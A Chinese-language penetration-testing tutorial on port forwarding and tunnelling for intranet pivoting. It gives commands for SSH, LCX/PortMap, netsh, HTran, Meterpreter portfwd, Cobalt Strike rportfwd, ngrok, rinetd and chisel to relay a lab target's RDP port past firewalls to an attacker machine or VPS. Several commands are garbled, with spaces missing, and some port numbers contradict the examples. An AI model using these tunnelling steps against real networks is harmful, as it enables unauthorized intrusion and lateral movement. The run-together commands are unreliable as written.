【内网渗透】全网最详细的端口转发教程

场景介绍

最近在真实环境测试和编写靶场实战教程时，总会遇到内网主机无法直接访问，需要通过转发端口、建立代理隧道等方式去访问，以方便后续进一步的横向渗透测试。本文章主要介绍一些端口转发工具的使用。

测试场景拓扑

图中所标注的IP地址为本地测试地址
Kali服务只能ping通192.168.52.129

正向连接和反向连接

学习端口转发之前，需要了解下什么事正向连接，什么是反向连接，如了解学习过，可以直接跳过本章节。

正向连接

受控端主机监听一个端口，控制端主机主动连接受控端主机，适用于受控端主机有公网IP的情况。

反向连接

控制端主机监听一个端口，受控端主机反向连接控制端主机，适用于受控端主机没有公网IP的情况。
如下图，受害机在内网，并且没有公网IP，攻击机无法通过IP地址访问，所以攻击机需要监听一个端口，让受害机反向连接攻击机。

端口转发

端口转发,有时被称为做隧道,是安全壳( SSH)为网络安全通信使用的一种方法简单来说,端口转发就是将一个端口收到的流量转发到另一个端口。

SSH端口转发

由于当前测试环境win7不自带SSH，需要下载安装SSH

在github上下载Openssh安装
解压到win7环境，并将路径加入到环境变量中，就可以直接使用

例1：要将本地的8080端口转发到远程服务器的80端口，可以使用以下命令：

ssh -L 18888:192.168.52.129:3389 kali@192.168.52.128
该条命令将192.168.52.128的1888端口的流量转发到192.168.52.129的3389端口

例2：要将远程服务器的8080端口转发到本地的80端口，可以使用以下命令：

ssh -R 3389:localhost:3389 username@sshserver
该条命令在目标主机上执行，将目标主机的3389端口指定到本地127.0.0.1的2289端口
可以在kali服务器上直接远程127.0.0.1端口

LCX

LCX是一款端口转发工具，分为Windows版和Linux版，Linux版本为PortMap。LCX有端口映射和端口转发两大功能，例如当目标的3389端口只对内开放而不对外开放时，可以使用端口映射将3389端口映射到目标的其他端口使用；当目标处于内网或目标配置的策略只允许访问固定某一端口时，可以通过端口转发突破限制。

本章仅演示LCX

场景一

由于配置了防火墙只允许web访问，这个时候攻击者想访问3389端口，远程连接是不可以的，就需要使用LCX进行端口转发

Web服务器开启了80端口，3389端口不允许出网，可以将web服务器的3389端口转发到允许出网的53端口，这个时候攻击者在本地监听53端口并且转发到1111端口，这个时候攻击者连接自己的1111端口，等于访问web服务器的3389端口

在攻击机机器上执行命令，监听本地53端口并且转发到本地1111端口

lcx.exe -listen 53 1111

在靶机执行命令，将本地的3389端口转发到192.168.198.129的 53端口

lcx.exe -slave 192.168.198.129 53 127.0.0.1 3389

在攻击机器上运行远程桌面，地址为127.0.0.1:1111

场景二

内网靶机开启了80端口，3389端口不允许出网，可以将内网靶机的3389端口转发到允许出网的54端口，这个时候攻击者在VPS监听54端口并且转发到1111端口，这个时候攻击者连接VPS的1111端口，等于访问内网靶机的3389端口
在内网靶机上运行以下命令，监听本地3389端口并且转发到VPS的54端口

lcx.exe -slave 192.168.0.114 54 127.0.0.1 3389

在vps运行lcx.exe -listen 54 1111，因为我的机器vps机器是kali系统所以使用的是portmap

./portmap -m 2 -p1 54 -p2 1111

在那内网攻击者机器上连接192.168.0.114:1111端口

netsh

使用windows自带的netsh配置规则也可达到和lcx一样的效果，但没有工具方便。建立转发规则：

netsh interfaceportproxyaddv4tov4listenport=6666 connect=3389connectaddress=192.168.1.2protocol=tcp

查看转发规则：

netsh interfaceportproxydump

删除转发规则：

netsh interfaceportproxydeletev4tov4listenport=7777

HTran

绕过防火墙
将本地3389端口转发到7777端口：

Htran.exe -tran 7777 127.0.0.1 3389

将本地端口转发到服务器端口

靶机：Htran.exe -slave 192.168.111.128 6666127.0.0.1 3389

服务器：/portmap -m 2 -p1 6666 -p2 5555

转发内网端口

靶机：HTran.exe -tran 6666 192.168.1.2 3389

攻击机：rdesktop 192.168.111.132:6666

portfwd（msf自带）

前提：获取到MSF会话

使用portfwd将靶机的3389转发到本地1234端口
在会话中执行：

meterpreter > portfwdadd-l 1234 -r 192.168.111.132-p 3389

使用portfwd list命令来查看转发规则：

CS插件

梼杌插件拥有一个端口转发工具名为iox：

发内网端口

rportfwd 8888 192.168.1.2 3389
rportfwd stop 8888

ngroc

访问官网注册登录

购买免费的隧道

以3389端口为例，添加完隧道后会有隧道ID和域名，下载Ngroc的客户端上传到靶机上

在靶机上执行

sunny.exe clientid id

看到上图中 隧道启动成功的字样说明隧道启动成功了！
可以直接用kali连接转发后的端口了 域名+端口

rinetd

vim /etc/rinetd.conf 编辑rinetd.confg文件内容为：0.0.0.0 2222 192.168.111.132
3389 即可将靶机的3389端口转发到本地2222端口

chisel

Chisel是一个快速TCP/UDP隧道，通过HTTP传输，通过SSH进行安全保护。单个可执行文件，包括客户端和服务器。Chisel主要用于通过防火墙，尽管它也可以用于为网络提供安全的端点。

工具下载：

https://github.com/jpillora/chisel

靶场转发本地的3000和8001端口 到10.10.14.64攻击机上。

攻击机：
chisel.exe server –port 12345
靶场：
chisel.exe client 10.10.14.64:12345 3000:127.0.0.1:3000 8001:127.0.0.1:8001